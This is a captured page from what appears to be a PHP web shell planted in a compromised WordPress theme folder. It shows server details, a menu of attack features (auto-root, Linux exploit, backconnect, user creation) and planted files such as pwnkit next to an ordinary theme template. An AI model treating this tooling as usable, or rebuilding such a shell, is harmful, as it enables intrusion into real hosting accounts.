Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
nature-one /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
799
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
868
B
-rw-r--r--
category.php
1019
B
-rw-r--r--
change_log.txt
574
B
-rw-r--r--
comments.php
3.06
KB
-rw-r--r--
content-home.php
987
B
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content-page.php
610
B
-rw-r--r--
content-single.php
1.6
KB
-rw-r--r--
content.php
4.01
KB
-rw-r--r--
editor-style.css
139
B
-rw-r--r--
footer.php
3
KB
-rw-r--r--
functions.php
11
KB
-rw-r--r--
functionsbak.php
10.51
KB
-rw-r--r--
header.php
6.17
KB
-rw-r--r--
image.php
3.81
KB
-rw-r--r--
index.php
15.05
KB
-rw-r--r--
license.txt
34.32
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
no-results.php
997
B
-rw-r--r--
options.php
28.4
KB
-rw-r--r--
page.php
1.96
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.12
KB
-rw-r--r--
screenshot.png
626.52
KB
-rw-r--r--
search.php
976
B
-rw-r--r--
searchform.php
678
B
-rw-r--r--
sidebar-page.php
422
B
-rw-r--r--
sidebar.php
1.03
KB
-rw-r--r--
single.php
871
B
-rw-r--r--
style.css
31.25
KB
-rw-r--r--
template-blog-post.php
1.05
KB
-rw-r--r--
template-full-width.php
1.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * The template for displaying home page. * * This is the template that displays all pages by default. * Please note that this is the WordPress construct of pages * and that other 'pages' on your WordPress site will use a * different template. * * @package SKT Nature One */ get_header(); ?> <?php if ( 'page' == get_option( 'show_on_front' ) && ( '' != get_option( 'page_for_posts' ) ) && $wp_query->get_queried_object_id() == get_option( 'page_for_posts' ) ) : ?> <div class="content-area"> <div class="middle-align content_sidebar"> <div class="site-main" id="sitemain"> <?php if ( have_posts() ) : // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the post format-specific template for the content. If you want to * use this in a child theme, then include a file called called content-___.php * (where ___ is the post format) and that will be used instead. */ get_template_part( 'content', get_post_format() ); endwhile; // Previous/next post navigation. skt_natureone_pagination(); else : // If no content, include the "No posts found" template. get_template_part( 'no-results', 'index' ); endif; ?> </div> <?php get_sidebar();?> <div class="clear"></div> </div> </div> <?php else: ?> <section style="background-color:#d0c90b;"> <div class="welcome-box middle-align"> <div class="features-section"> <?php if( of_get_option('boxfirst',true) == 1 ) { ?> <?php for($k=1;$k<5;$k++) { ?> <div class="feature-box"> <h5><?php _e('Dummy Title','nature-one'); ?></h5> <p><?php _e('Go to Appearance >> Theme Options >> Homepage Content.','nature-one'); ?></p> </div><!-- feature-box --> <?php } ?> <?php } else { ?> <?php if( of_get_option('boxfirst',false)) { ?> <div class="feature-box"> <?php $boxfirst = new WP_Query('page_id='.of_get_option('boxfirst')); while($boxfirst->have_posts()) : $boxfirst->the_post(); ?> <?php if( has_post_thumbnail()) { ?> <div class="feat-image"><?php the_post_thumbnail( array(85,85) ); ?></div><!-- feat-image --> <?php } ?> <h5><?php the_title(); ?></h5> <?php if( has_post_thumbnail() ) { ?> <?php echo skt_natureone_content(15); ?> <?php } else { ?> <?php echo skt_natureone_content(32); ?> <?php } ?> <a href="<?php esc_url(the_permalink()); ?>"><?php _e('Read More','nature-one'); ?></a> <?php endwhile; ?> </div><!-- box-first --> <?php } ?> </div><!-- feature-section --> <div class="features-section"> <?php if( of_get_option('boxsecond',false)) { ?> <div class="feature-box"> <?php $boxfirst = new WP_Query('page_id='.of_get_option('boxsecond')); while($boxfirst->have_posts()) : $boxfirst->the_post(); ?> <?php if( has_post_thumbnail()) { ?> <div class="feat-image"><?php the_post_thumbnail( array(85,85) ); ?></div><!-- feat-image --> <?php } ?> <h5><?php the_title(); ?></h5> <?php if( has_post_thumbnail() ) { ?> <?php echo skt_natureone_content(15); ?> <?php } else { ?> <?php echo skt_natureone_content(32); ?> <?php } ?> <a href="<?php esc_url(the_permalink()); ?>">><?php _e('Read More','nature-one'); ?></a> <?php endwhile; ?> </div><!-- box-first --> <?php } ?> </div><!-- feature-section --> <div class="features-section"> <?php if( of_get_option('boxthird',false)) { ?> <div class="feature-box"> <?php $boxfirst = new WP_Query('page_id='.of_get_option('boxthird')); while($boxfirst->have_posts()) : $boxfirst->the_post(); ?> <?php if( has_post_thumbnail()) { ?> <div class="feat-image"><?php the_post_thumbnail( array(85,85) ); ?></div><!-- feat-image --> <?php } ?> <h5><?php the_title(); ?></h5> <?php if( has_post_thumbnail() ) { ?> <?php echo skt_natureone_content(15); ?> <?php } else { ?> <?php echo skt_natureone_content(32); ?> <?php } ?> <a href="<?php esc_url(the_permalink()); ?>">><?php _e('Read More','nature-one'); ?></a> <?php endwhile; ?> </div><!-- box-first --> <?php } ?> </div><!-- feature-section --> <div class="features-section"> <?php if( of_get_option('boxfourth',false)) { ?> <div class="feature-box"> <?php $boxfirst = new WP_Query('page_id='.of_get_option('boxfourth')); while($boxfirst->have_posts()) : $boxfirst->the_post(); ?> <?php if( has_post_thumbnail()) { ?> <div class="feat-image"><?php the_post_thumbnail( array(85,85) ); ?></div><!-- feat-image --> <?php } ?> <h5><?php the_title(); ?></h5> <?php if( has_post_thumbnail() ) { ?> <?php echo skt_natureone_content(15); ?> <?php } else { ?> <?php echo skt_natureone_content(32); ?> <?php } ?> <a href="<?php esc_url(the_permalink()); ?>">><?php _e('Read More','nature-one'); ?></a> <?php endwhile; ?> </div><!-- box-first --> <?php } } ?> </div><!-- feature-section --><div class="clear"></div> </div><!-- middle-align --><div class="clear"></div> </section><div class="clear"></div> <section style="background-color:#303030;"> <div class="awesome-bg middle-align"> <?php if( of_get_option('recenttitle',true) != 1){ ?><h2><span><?php echo of_get_option('recenttitle',true); ?></span></h2><?php } else { ?><h2><span><?php _e('Recent Work','nature-one'); ?></span></h2><?php } ?> <?php if( of_get_option('recentfirst',true) == 1) { ?> <?php for($n=1; $n<4;$n++) { ?> <div class="work-thumb"> <a href="#"><img width="262px" height="189px" alt="Dummy Title" src="<?php echo get_template_directory_uri();?>/images/flower-thum.jpg" class="example-image"></a><a data-lightbox="example-1" href="<?php echo get_template_directory_uri();?>/images/flower-thum.jpg" class="example-image-link"><img src="<?php echo get_template_directory_uri(); ?>/images/zoom-icon.png"></a> </div><!-- work-thumb --> <?php } } else { ?> <?php if( of_get_option('recentfirst',false)) { $recent = new WP_Query('page_id='.of_get_option('recentfirst')); while($recent->have_posts() ) : $recent->the_post(); ?> <?php $thumb = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'large', true ); $url = $thumb['0']; ?> <div class="work-thumb"> <a href="<?php the_permalink(); ?>"><img width="262px" height="189px" alt="<?php the_title(); ?>" src="<?php echo $url; ?>" class="example-image"></a><a data-lightbox="example-1" href="<?php echo $url; ?>" class="example-image-link"><img src="<?php echo get_template_directory_uri(); ?>/images/zoom-icon.png"></a> </div><!-- work-thumb --> <?php endwhile; } ?> <?php if( of_get_option('recentsecond',false)) { $recent = new WP_Query('page_id='.of_get_option('recentsecond')); while($recent->have_posts() ) : $recent->the_post(); ?> <?php $thumb = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'large', true ); $url = $thumb['0']; ?> <div class="work-thumb"> <a href="<?php the_permalink(); ?>"><img width="262px" height="189px" alt="<?php the_title(); ?>" src="<?php echo $url; ?>" class="example-image"></a><a data-lightbox="example-1" href="<?php echo $url; ?>" class="example-image-link"><img src="<?php echo get_template_directory_uri(); ?>/images/zoom-icon.png"></a> </div><!-- work-thumb --> <?php endwhile; } ?> <?php if( of_get_option('recentthird',false)) { $recent = new WP_Query('page_id='.of_get_option('recentthird')); while($recent->have_posts() ) : $recent->the_post(); ?> <?php $thumb = wp_get_attachment_image_src( get_post_thumbnail_id($post->ID), 'large', true ); $url = $thumb['0']; ?> <div class="work-thumb"> <a href="<?php the_permalink(); ?>"><img width="262px" height="189px" alt="<?php the_title(); ?>" src="<?php echo $url; ?>" class="example-image"></a><a data-lightbox="example-1" href="<?php echo $url; ?>" class="example-image-link"><img src="<?php echo get_template_directory_uri(); ?>/images/zoom-icon.png"></a> </div><!-- work-thumb --><div class="clear"></div> <?php endwhile; } } ?> </div><!-- awesome-bg --><div class="clear"></div> </section><!-- section2 --> <section class="menu_page"> <div class="middle-align"> <?php $blogpost = new WP_Query('showposts='.of_get_option('blogdisplay')); ?> <?php $j = 0; ?> <?php if( of_get_option('bloghead',true) != 1) { ?><h2><span><?php echo of_get_option('bloghead',true); ?></span></h2><?php } else { ?><h2><span><?php _e('Whats New?','nature-one'); ?></span></h2> <?php } ?> <?php if( $blogpost->have_posts() ) : while( $blogpost->have_posts() ) : $blogpost->the_post(); ?> <?php $j++; ?> <div class="blog-box" <?php if($j%2==0) {?> style="float:right" <?php } ?>> <div class="blog-meta"><?php echo get_the_time('j'); ?><br /><?php echo date('M'); ?></div><!-- blog-meta --> <div class="blog-right"><h4><a href="<?php the_permalink(); ?>"><?php the_title(); ?></a></h4> <?php echo skt_natureone_content(25); ?> <a href="<?php esc_url(the_permalink()); ?>"><?php _e('Read More...','nature-one'); ?></a> </div><!-- blog-right --> </div><!-- blog-box --><?php if($j%2==0) { ?><div class="clear"></div><?php } ?> <?php endwhile; else : endif; ?><div class="clear"></div> </div><!-- middle-align --> </section> <?php endif; ?> <?php get_footer(); ?>
Close